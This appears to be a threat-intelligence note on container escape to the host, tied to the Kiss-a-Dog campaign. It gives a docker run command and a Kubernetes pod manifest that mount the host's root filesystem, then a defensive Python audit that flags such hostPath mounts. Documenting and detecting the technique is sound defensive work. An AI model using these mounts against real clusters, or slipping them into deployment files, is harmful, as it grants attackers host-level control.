Tags: K8s
ATT&CK Tactic: Privilege Escalation (TA0004)
Last edited: Jan 18, 2024 1:25 PM
Status: Stub
In the Kiss-a-Dog campaign, this was the method used to escape from the container (which had been launched through an exposed Docker socket) to the host.
An attacker needs to start the new container with the -v or --mount option when using the docker client (or the equivalent option of another CRI). When specifying the host volume to mount, the attacker sets the source path to "/" or another useful folder, like so:
docker run -d \
  -it \
  --name devtest \
  -v "/:/host-root" \
  malicious:image
Next, from within the container, the host's / directory is accessible as /host-root. Typically the next step is to chroot into /host-root so that the host's own binaries can be used.
A similar mapping can be done on other CRIs (CRI-O, containerd, Podman) and directly in a Kubernetes pod manifest. For example:
apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
spec:
  containers:
  - image: registry.k8s.io/malicious:latest
    name: nginx
    volumeMounts:
    - mountPath: /test-pd
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      # directory location on host
      path: /
      # this field is optional
      type: Directory
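A defender-side check for the pattern shown in both the docker command and the pod manifest above, added here as an example that is not part of the original note: it walks a pod object (as `kubectl get pod -o json` would return it) and reports hostPath volumes that a container actually mounts, flagging those that expose / or another sensitive host directory. The sensitive-path list and the two sample pods are assumptions constructed for this example.

```python
import os

# Host directories whose exposure gives a container effective host access
# (an assumption for this example; "/" is always flagged, extend the rest as needed).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/sys", "/var/lib/kubelet",
                        "/var/run/docker.sock", "/run/containerd")

def is_sensitive_host_path(path):
    """True for '/' itself and for anything at or below a listed directory."""
    norm = os.path.normpath(path or "")
    return norm == "/" or any(norm == p or norm.startswith(p + "/")
                              for p in SENSITIVE_HOST_PATHS)

def find_hostpath_mounts(pod):
    """Every hostPath volume that a container or initContainer actually mounts."""
    spec = pod.get("spec", {})
    host_paths = {v["name"]: v["hostPath"].get("path", "")
                  for v in spec.get("volumes", []) if "hostPath" in v}
    findings = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in host_paths:
                hp = host_paths[m["name"]]
                findings.append({"container": c.get("name"), "host_path": hp,
                                 "mount_path": m.get("mountPath"),
                                 "read_only": bool(m.get("readOnly", False)),
                                 "sensitive": is_sensitive_host_path(hp)})
    return findings

def audit_pod(pod):
    """Only the mounts that expose a sensitive host directory (the escape pattern above)."""
    return [f for f in find_hostpath_mounts(pod) if f["sensitive"]]

# Constructed sample: the manifest from this note, as `kubectl get pod -o json` would return it.
MALICIOUS_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "malicious-pod"},
    "spec": {"containers": [{"name": "nginx", "image": "registry.k8s.io/malicious:latest",
                             "volumeMounts": [{"mountPath": "/test-pd", "name": "test-volume"}]}],
             "volumes": [{"name": "test-volume", "hostPath": {"path": "/", "type": "Directory"}}]},
}

# Constructed sample: same shape, but the volume is an emptyDir, so nothing should be flagged.
BENIGN_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "scratch-pod"},
    "spec": {"containers": [{"name": "app", "image": "registry.k8s.io/pause:3.9",
                             "volumeMounts": [{"mountPath": "/scratch", "name": "scratch"}]}],
             "volumes": [{"name": "scratch", "emptyDir": {}}]},
}
```

`audit_pod(MALICIOUS_POD)` returns the single / mount at /test-pd, while `audit_pod(BENIGN_POD)` returns nothing; the Pod Security Admission `baseline` profile rejects any hostPath volume outright, so this check is mainly useful for clusters that cannot yet enforce it.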